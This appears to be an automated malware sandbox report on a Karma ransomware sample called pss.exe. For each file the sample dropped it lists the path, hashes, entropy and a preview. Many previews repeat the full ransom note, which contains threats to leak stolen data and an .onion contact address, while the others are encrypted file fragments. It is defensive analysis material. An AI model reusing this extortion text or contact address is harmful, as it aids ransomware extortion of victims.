Preview: SY..$bU......#..........]...........y.Tlx.9M[.G..../.NhY.]y...KARMA..>b....4.5.p..7..=..d$L.C3.l....lo.G|....SF..A7..Z-._s.D./[:^.....p.?.R.up......O..5QS.W......C......\..AV...V_.u<7..(G.0.-.d}.8FPkf......G..k..X..y...)..S&..@8...E..|o..d..yA.(O...H........TR..2....h..(...~KF!'....%..T73....a.[`C..n-@..o..u....$~X.2.w..K....W.L..5.v..0...S..,t..uh........nO`....iY.........c...f|....A....%..-.u........)c.!./wnH.L;b,...S....MO.x.3..%..N..>.....T.7...H..n.^q..>.JF.G...Uc.*...,...r=..i.KR....7(..(.Y...}....;.D..aM....#<{..u#.QTY.........R...P.1..0...g.LA#.@G8Rd3..rj...].X..e"..8.....>..z2..q.n.....7.<h.....tc.{...9..K.z3@..2f<=k.,..\.Q..........dt..&.x..;........ji...o?...H.Jmq......V.z.R........3..%....Th.;..`. ......v.,?NgQ..I....A...p.<.....P2Rs.|......i..+.$....?...f1XD<..sa.6.L....8.S......A..P.Y_..... i,e....<...X2;...!..+. .lzH.......R(.d.b.)....Q..,J.Q.j...x.5.-.6...<.P.oG...D..9.........l.u...K.....)m.M..Uw|.q.$....x..vE.$.X:b.Ce.
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):63667
Entropy (8bit):7.996620789477532
Encrypted:true
SSDEEP:1536:Fu1xQ3f2ILT3eoJ7dgnqzOd8lKYMvD+QG80HV8cTfPl:FJje6JtzOucDN+WI
MD5:B7B7CE3755BF0B308E333B67A5F9EBDD
SHA1:760278EFDE110FFEB6632E6D8FE44CD18ED8CCF1
SHA-256:545EDAEE693796F2B6C1854FA8DA54AAF72A59461F4C61D5E5E6BE21DFFF98E0
SHA-512:7B47D6BA0630D8B4AFAEB480CBFDEC0EAAC0B5B0994A82DB26DAC436359FD29C6E03E78B419FB80DD34EBB34D5DEDC9EBAEB48A83E9C406251C0FA576FAAD2BE
Malicious:true
Preview: .j.Ez..h.......>.y)...Z..Z(.=...,.4.T.](.rr...b.T.....L.f...KARMA.>.9...}toX...+..`..9>.=E....T.?~W...mO#Y.w..-.l<..1...F.,.XK...c..9.....A}.M....v..-./..J..........Y....q.0r.T..s.,.;..)?a..[M....K4@?0..]....T...!Y.2Gw].w.....4_6%.....[..Hr...MXf.A.?4E..f.L.t...H."..D.up.:4....W....d.......v.P.u.......-........vA.)>..^...]..l.....2Mh..Fl.7~.y&me7#r....,".,..X..w....O......l.N.)....n.z.j....\.S.N.7.y/R.4..B...F......#.d...W.......1....u.;%4..}().M+..[.=....Y...*.@.=......o.XB.............DA...L@'...@.O.....$.....4.kw.N..ht.f#.].~o.......X....k......|...M.....?' a....'.d..K.)!2.B..Z..&E..c.....!.b..O...z...G..|j....:...3.x^.2.....,^.D..e.........b...)...<.Z.bs,.b..-..>A...c..>8J.EjE.n_:.7.."....W.X.v.q....k(..Sxl?.X.O.fl.9..v...k<.We"Vp.G.....-...3.....AY{..=.T.b.d.4.HH.....0.l..Q....+A..... E...J.F./.!u.%.wd.>..l...~.c.p..$.E.*_.......N.[.-.....ND....mO.~.....!....;......6.."..Q.kf.. 2....D..#.. ..[.T.......e.z.L.r. ...2.
C:\Users\user\AppData\Local\Adobe\Acrobat\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):667
Entropy (8bit):7.7271977987515
Encrypted:false
SSDEEP:12:83g0djs8PKnM8np6k/BkbXDrxd8tibhueAWwUbrbspetdsb:83FY8PGnp6k/Bg8tCRwyKb
MD5:4C558D46A54E4FA0E189D1914FFECCE1
SHA1:357A1804950323DBDF39A619D94E374493768AC9
SHA-256:CA03CA6ABA9DAA9AD61C61409722613CE43F7DB61E8B7776FED1793DDA1C4AE4
SHA-512:E684C8055B624071C91227A2ECCDA58542AAA2031B57EF1F1E5182D50A0208AC6E8D19F1CE50772CFF56C6EE5044394F0EEADEF8D9E7BE965064ABD0E82DFF80
Malicious:false
Preview: ..l....z........8.......j.....+$...,x[..r...T6...k..0......KARMA.^...K..N...0@.(..8.......W...d...n.C.J...6..........} .P.....0...@..H...=.@.l..6..F|.....B..y.zGQ..xE*..C}0.3...}.L-.=8+...:.?...w..,.QV."...<.....g0A....^.VFd.j.A.<nhg....li..U{`.5.....Q.._.,q....8..e.E7|..X..4......E...h.oX.....Y.#=.SZa@/..<..R.p,.>k....#!..;...,.'.....ng...9.x<..WK.b...b=...~K.t.i.................'.&H.;L...I..../.q-...6.4.o.5@2+....._...1.*J..b.R".=..Rn.4...8.t...Vw".[V.... ........,...#`.i. v.].....#..C....b7G....w....Z!...1..m7.Mf.....\|..P.dW.I4M[.8.._.o.\.Q+k.O...E...@...r.+.Bq.i7w+u9B.....u..........8.D...........W.74...DZ...e.k'...w..
C:\Users\user\AppData\Local\Adobe\Color\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Color\Profiles\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):14832
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:466666666666R
MD5:A10DA1249D52B7A32168307227105DD9
SHA1:1F69AFECFCF5EE4A9C697CB16C5344D88B99E4AC
SHA-256:71AD8BFD0761492EC5325A98B78EFD77AFDCFB71C1A3D05C002475C57FF5D92C
SHA-512:20DBEC3C497E276CFF87790BAAB13F7C99F4B8431FBFE42A465C419FB3DB382001B05F66AD50F3E2B212B577ECF001AE4B13DA46038ED1200ED29333943CC0C5
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):14832
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:466666666666R
MD5:A10DA1249D52B7A32168307227105DD9
SHA1:1F69AFECFCF5EE4A9C697CB16C5344D88B99E4AC
SHA-256:71AD8BFD0761492EC5325A98B78EFD77AFDCFB71C1A3D05C002475C57FF5D92C
SHA-512:20DBEC3C497E276CFF87790BAAB13F7C99F4B8431FBFE42A465C419FB3DB382001B05F66AD50F3E2B212B577ECF001AE4B13DA46038ED1200ED29333943CC0C5
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.546859420514927
Encrypted:false
SSDEEP:3:F+jje9WJdw1lR1v8PGS2YRk/rJ:F+Y68/
MD5:5B499BED35FED7243509F451A75928E7
SHA1:5FABF5457BE665924EFD0345849A8E713EDC1F01
SHA-256:828D1258E9D7E635A146E99305A030D7080B24921437D874F962E9557B662FF8
SHA-512:294F2342BE760D021E47337C451BACE54888FCE29DC7A4F468A6AC589EF0889C0AB28D4D97E429A710988F23B37B3A7BDD7C936DA150F5C3F211A5B4A6B4C843
Malicious:false
Preview: ..c4..m..i..Yn.{...w3{.......=.j=-tR...e..n...1...|=. .....KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.600994746507819
Encrypted:false
SSDEEP:3:7CHl/Kx+VqtM0115:Qli7M0r5
MD5:E0A45DCCAA9B437A536F14824F97A152
SHA1:BA550F9FA20C67569823FAC2931422EA62AC5B17
SHA-256:6A559727651492A2565DC8B3886AD98277012C99550F1776D392A4C62C913B6D
SHA-512:03139DC5358EDFD0CD55959AD5F718FB7AC0F3AA145F73EC5DD046A6F4DBF5D52F7B96C13AC2E7428DBA6CE350AD744CA7FA9A8311821F5371DFA9BA020ABF8D
Malicious:false
Preview: 3.:.z....nO_.u...[.i.LARe.3....O.*...|.../..P..}<m..9.......KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.737370247003717
Encrypted:false
SSDEEP:3:TNavKfB6lGAZkolOKupk35:TNavE2oKJ
MD5:02B7046153A5999A7407DA486AAFBF80
SHA1:D0F479A6D0D8CE262EB5C3DB9EF20470EDDA0E9B
SHA-256:C42CF58ACF126C010107B40A6EBD3504ACDA5B01FD89F159EC9C4D43C3DF0748
SHA-512:78C6D29BB76FEAAF95DD682C13235BC13F994418347B9DDB86601A8BB46FD14F0B7591FD97006CC967F1D332FB08F312EA603394EFD376C1D7B3EEA8F227AABC
Malicious:false
Preview: .I.s..cS.^..T..(..mM.d....vG..."..jb..NB4...u...F.o....dE...KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.640920652336276
Encrypted:false
SSDEEP:3:9JT4o8cD7aYB9dT9:rT18JYz19
MD5:E51761D4EAEB7C232441C672460CC10F
SHA1:8C33F89BE3A2490024AA3199415C92638B0B1D1A
SHA-256:1AFDAE05A0921A5E4F6F314600C0586E028DBD748A49067572090AE744198472
SHA-512:1CA48BB3C72C801E95FC8723768C68C620654D68597748EB31860DBB7BA7EDD33850B6217FBB056300A8DF45E7F6A89254EF6681B1636F50BDE1ECD58EF1A067
Malicious:false
Preview: .L..,..H....X]t;...g..[=..\...\.Eac.T.u...W..W.E..g..:m.OG...KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):160
Entropy (8bit):6.663016082604735
Encrypted:false
SSDEEP:3:pqGGJSezV7JTlQGv2B7XSS+z8EQWy1NykjlG8GFPdpUcZ8MFBoflDKp0n:kGGJSezVPQeXS+4EQWClU5FNFiNC0
MD5:C5FFF037728FEAA3C3B1828E31E766BC
SHA1:CFCB22ADA29D280B28B5DC3C7127F3D96D34DEAC
SHA-256:B8F60BD82CCE7E6E946B4B4A389ED3E584102B481C14D689923FA6988CC21C99
SHA-512:865004CB32567870F62ED3BEB5CF38740A3D1779DE8C0CEF1FFAB75ADB9B73632A30BBD73A6236C26C20BB21F2EB770692F10E634C3282C5D8BA3FA8B8335FDE
Malicious:false
Preview: ..+...a#.?Il/.Piz....W...v..8...Ep..D.N.~...E. z......T.........KARMAq..V.fL0h.$.........h..m..p../,..#`............M{%..L....&..:...c......TA....&.U...-...
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
